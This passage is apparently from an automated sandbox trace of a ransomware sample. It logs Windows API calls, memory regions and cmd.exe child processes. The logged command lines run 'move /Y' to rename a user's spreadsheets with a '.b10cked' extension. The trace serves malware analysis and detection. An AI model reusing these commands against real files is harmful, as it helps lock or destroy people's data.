lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f85c | out: lpFindFileData=0x28f85c) returned 0x3dfff8 [0131.893] FindClose (in: hFindFile=0x3dfff8 | out: hFindFile=0x3dfff8) returned 1 [0131.894] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0131.894] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0131.894] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0131.894] GetEnvironmentStringsW () returned 0x3e2ad8* [0131.894] FreeEnvironmentStringsW (penv=0x3e2ad8) returned 1 [0131.894] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.894] GetConsoleOutputCP () returned 0x1b5 [0131.895] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0131.895] GetUserDefaultLCID () returned 0x409 [0131.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0131.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28fc20, cchData=128 | out: lpLCData="0") returned 2 [0131.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28fc20, cchData=128 | out: lpLCData="0") returned 2 [0131.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28fc20, cchData=128 | out: lpLCData="1") returned 2 [0131.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0131.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0131.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0131.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0131.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0131.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0131.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0131.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0131.895] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0131.895] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0131.895] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0131.896] GetConsoleTitleW (in: lpConsoleTitle=0x3d08d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.896] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0131.896] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0131.896] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0131.896] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0131.897] _wcsicmp (_String1="move", _String2=")") returned 68 [0131.897] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0131.897] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0131.897] _wcsicmp (_String1="IF", _String2="move") returned -4 [0131.897] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0131.897] _wcsicmp (_String1="REM", _String2="move") returned 5 [0131.897] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0131.899] GetConsoleTitleW (in: lpConsoleTitle=0x28f918, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.900] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0131.900] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0131.900] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0131.900] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0131.900] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0131.900] _wcsicmp (_String1="move", _String2="CD") returned 10 [0131.900] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0131.900] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0131.900] _wcsicmp (_String1="move", _String2="REN") returned -5 [0131.900] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0131.900] _wcsicmp (_String1="move", _String2="SET") returned -6 [0131.900] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0131.900] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0131.900] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0131.900] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0131.900] _wcsicmp (_String1="move", _String2="MD") returned 11 [0131.900] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0131.900] _wcsicmp (_String1="move", _String2="RD") returned -5 [0131.900] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0131.900] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0131.900] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0131.900] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0131.900] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0131.900] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0131.900] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0131.900] _wcsicmp (_String1="move", _String2="VER") returned -9 [0131.900] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0131.900] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0131.900] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0131.900] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0131.900] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0131.900] _wcsicmp (_String1="move", _String2="START") returned -6 [0131.900] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0131.900] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0131.900] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0131.902] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0131.902] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0131.902] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x28f6d4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x28f6cc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x28f6cc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0131.902] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0131.902] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0131.902] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0131.902] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0131.902] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0131.902] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0131.902] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0131.902] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0131.902] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0131.902] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0131.902] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0131.902] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0131.902] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0131.902] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0131.903] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0131.903] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.903] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.903] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.903] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.903] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0131.903] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0131.903] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0131.903] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0131.903] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0131.903] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0131.903] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0131.903] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0131.903] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0131.903] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0131.903] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0131.903] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0131.903] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0131.903] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0131.903] _wcsicmp (_String1="QFL-BV~1.XLS", _String2=".") returned 67 [0131.903] _wcsicmp (_String1="QFL-BV~1.XLS", _String2="..") returned 67 [0131.903] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\QFL-BV~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\qfl-bv~1.xls")) returned 0x20 [0131.904] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3e1d40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.904] SetErrorMode (uMode=0x0) returned 0x0 [0131.904] SetErrorMode (uMode=0x1) returned 0x0 [0131.904] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\QFL-BV~1.XLS", nBufferLength=0x104, lpBuffer=0x28f05c, lpFilePart=0x28f044 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\QFL-BV~1.XLS", lpFilePart=0x28f044*="QFL-BV~1.XLS") returned 0x26 [0131.904] SetErrorMode (uMode=0x0) returned 0x1 [0131.904] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1" (normalized: "c:\\users\\eebsym5\\docume~1")) returned 0x13 [0131.904] _wcsicmp (_String1="QFL-BV~1.XLS", _String2=".") returned 67 [0131.904] _wcsicmp (_String1="QFL-BV~1.XLS", _String2="..") returned 67 [0131.904] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\QFL-BV~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\qfl-bv~1.xls")) returned 0x20 [0131.904] SetErrorMode (uMode=0x0) returned 0x0 [0131.904] SetErrorMode (uMode=0x1) returned 0x0 [0131.904] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\QFL-BV~1.XLS", nBufferLength=0x104, lpBuffer=0x28f4d8, lpFilePart=0x28f270 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\QFL-BV~1.XLS", lpFilePart=0x28f270*="QFL-BV~1.XLS") returned 0x26 [0131.904] SetErrorMode (uMode=0x0) returned 0x1 [0131.905] SetErrorMode (uMode=0x0) returned 0x0 [0131.905] SetErrorMode (uMode=0x1) returned 0x0 [0131.905] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\qFL-bVPAqe.xlsx.b10cked", nBufferLength=0x104, lpBuffer=0x28f6e0, lpFilePart=0x28f270 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\qFL-bVPAqe.xlsx.b10cked", lpFilePart=0x28f270*="qFL-bVPAqe.xlsx.b10cked") returned 0x31 [0131.905] SetErrorMode (uMode=0x0) returned 0x1 [0131.905] SetLastError (dwErrCode=0x0) [0131.905] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\qFL-bVPAqe.xlsx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\qfl-bvpaqe.xlsx.b10cked")) returned 0xffffffff [0131.905] GetLastError () returned 0x2 [0131.905] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\QFL-BV~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x28ebec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28ebec) returned 0x3d0f08 [0131.905] FindNextFileW (in: hFindFile=0x3d0f08, lpFindFileData=0x28ebec | out: lpFindFileData=0x28ebec) returned 0 [0131.906] GetLastError () returned 0x12 [0131.906] FindClose (in: hFindFile=0x3d0f08 | out: hFindFile=0x3d0f08) returned 1 [0131.907] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\QFL-BV~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x3e1ae0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3e1ae0) returned 0x3d0f08 [0131.907] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\qFL-bVPAqe.xlsx.b10cked", nBufferLength=0x104, lpBuffer=0x28ee84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\qFL-bVPAqe.xlsx.b10cked", lpFilePart=0x0) returned 0x31 [0132.047] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\qFL-bVPAqe.xlsx", nBufferLength=0x104, lpBuffer=0x28ee84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\qFL-bVPAqe.xlsx", lpFilePart=0x0) returned 0x29 [0132.047] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\qFL-bVPAqe.xlsx" (normalized: "c:\\users\\eebsym5\\docume~1\\qfl-bvpaqe.xlsx")) returned 0x20 [0132.048] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\qFL-bVPAqe.xlsx" (normalized: "c:\\users\\eebsym5\\docume~1\\qfl-bvpaqe.xlsx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\qFL-bVPAqe.xlsx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\qfl-bvpaqe.xlsx.b10cked"), dwFlags=0x3) returned 1 [0132.048] FindClose (in: hFindFile=0x3d0f08 | out: hFindFile=0x3d0f08) returned 1 [0132.048] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x28ee38 | out: _Buffer=" 1") returned 9 [0132.048] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.048] GetFileType (hFile=0x7) returned 0x2 [0132.048] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0132.048] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28edc4 | out: lpMode=0x28edc4) returned 1 [0132.048] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.049] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x28edf8 | out: lpConsoleScreenBufferInfo=0x28edf8) returned 1 [0132.049] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0132.049] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x28ee38 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0132.049] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x28ee1c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28ee1c*=0x1a) returned 1 [0132.049] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.049] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0132.049] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.049] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0132.050] _get_osfhandle (_FileHandle=0) returned 0x3 [0132.050] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0132.050] SetConsoleInputExeNameW () returned 0x1 [0132.050] GetConsoleOutputCP () returned 0x1b5 [0132.050] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0132.050] SetThreadUILanguage (LangId=0x0) returned 0x409 [0132.050] exit (_Code=0) Process: id = "109" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16900" os_pid = "0xa74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5DDJXD~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5d djXdWwSLPL XJ.xls.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11958 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11959 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11960 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11961 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 11962 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 11963 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11964 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11965 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11966 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 11967 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12123 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12124 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12125 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12126 start_va = 0xd0000 end_va = 0xdffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 12127 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 12128 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 12129 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12130 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12131 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12132 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12133 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12134 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12135 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12136 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12137 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 12138 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12139 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 12140 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 12141 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 12142 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 12143 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 12144 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 12145 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 12146 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Thread: id = 166 os_tid = 0x958 [0131.715] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fc4c | out: lpSystemTimeAsFileTime=0x26fc4c*(dwLowDateTime=0x8870af60, dwHighDateTime=0x1d440a9)) [0131.715] GetCurrentProcessId () returned 0xa74 [0131.715] GetCurrentThreadId () returned 0x958 [0131.715] GetTickCount () returned 0x29f69 [0131.715] QueryPerformanceCounter (in: lpPerformanceCount=0x26fc44 | out: lpPerformanceCount=0x26fc44*=18850384386) returned 1 [0131.715] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0131.715] __set_app_type (_Type=0x1) [0131.715] __p__fmode () returned 0x76b331f4 [0131.715] __p__commode () returned 0x76b331fc [0131.715] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0131.716] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0131.716] GetCurrentThreadId () returned 0x958 [0131.716] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x958) returned 0x38 [0131.716] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0131.716] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0131.716] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.716] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0131.716] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fbdc | out: phkResult=0x26fbdc*=0x0) returned 0x2 [0131.716] VirtualQuery (in: lpAddress=0x26fc13, lpBuffer=0x26fbac, dwLength=0x1c | out: lpBuffer=0x26fbac*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.716] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fbac, dwLength=0x1c | out: lpBuffer=0x26fbac*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0131.716] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fbac, dwLength=0x1c | out: lpBuffer=0x26fbac*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0131.716] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26fbac, dwLength=0x1c | out: lpBuffer=0x26fbac*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.716] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fbac, dwLength=0x1c | out: lpBuffer=0x26fbac*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0131.716] GetConsoleOutputCP () returned 0x1b5 [0131.716] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0131.716] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0131.717] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.717] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0131.717] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.717] GetConsoleMode 